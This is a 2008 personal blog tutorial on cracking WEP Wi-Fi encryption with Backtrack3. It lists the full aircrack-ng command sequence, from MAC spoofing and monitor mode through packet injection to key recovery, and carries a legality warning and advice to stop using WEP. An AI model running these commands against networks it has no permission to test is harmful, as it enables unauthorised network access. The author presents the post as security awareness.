At A Glance Main Projects Tutorials Resume

Contact


Email: palen1c at gmail.com




How To Crack WEP Encryption

Mon, 01 Sep 2008 10:12:56 EST

Something I have always wanted to do but never took the time until recently was learn how to crack WEP encryption. I can remember scurrying from class to class in college nearly two years ago while listening to Security Now with Leo Laporte and Steve Gibson explain just how bad WEP had been compromised. After taking a few hours yesterday to read up on the subject, I was able to break the WEP encryption on my own router in a matter of minutes (using a weak passphrase). The process is so easy now for phrases that non-security conscious users would implement, that I think my little sister could do it. The methodology I used requires that the passphrase be contained in the dictionary file of the software you are using to crack the encryption. I have decided to re-post the method I used to demonstrate how easy it is and encourage people NOT to use WEP encryption.

The popular Cain and Able software for Windows cant do this without the purchase of a 100 special chipset wireless card (its BS, they must have a partnership with the wireless card vendor) so you can't use Windows.

Go grab yourself a copy of Backtrack3 it comes as an ISO file. You use a CD burning program to write this iso to a CD-R. You then start your computer with this disk in the CD drive and instruct your computer to boot from the disk. Backtrack will run without installing anything on your computer.

Once you have backtrack3 running and it seems to be working, the rest is cake. There is actually a Youtube video that I followed that worked perfectly. Its titled Crack wep CLIENTLESS with backtrack3

NOTE: Your wireless card probably isnt "wlan0" as his is in the video. Mine was on eth1. You can check this using some of backtracks utilities in the "Internet" menu item. Also in Linux you can hold the Control + C button to stop a program running. For example, after I get the BSSID in step 3, I use control + C to stop airmon-ng.

So here is a list of the commands he uses:


macchanger -mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng wlan0 (get the channel, BSSID, and ESSID you want to test)

airodump-ng -c (channel) -w (filename to write to) --bssid (the bssid) wlan0

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0 (get 100,000 data to be safe)

aircrack-ng (filename that was written to)


Thats it! Remember that it is ILLEGAL to break encryption on a network that is not your own. I would however, get your friends permission to break their encryption in order to show them just how insecure WEP is.

Charles Palen has been involved in the technology sector for several years. His formal education focused on Enterprise Database Administration. He currently works as the principal software architect and manager at Transcending Digital where he can be hired for your next contract project. Charles is a full stack developer who has been on the front lines of small business and enterprise for over 10 years. Charles current expertise covers the areas of .NET, Java, PHP, Node.js, Javascript, HTML, and CSS. Charles created Technogumbo in 2008 as a way to share lessons learned while making original products.

Comments

Eric
Eric
October 16, 2008 2:32 pm

HAHA! That's awesome, Chuck. I've thought about reading up on this just for the sake of feeling hacky, but never took the time. Nice post.

Comments are currently disabled.

Post Message

Techno Gumbo RSS Feed

Related Links

Steve Gibsons GRC
Cain and Able for Windows
Backtrack3
Youtube Crack WEP Clientless with Backtrack3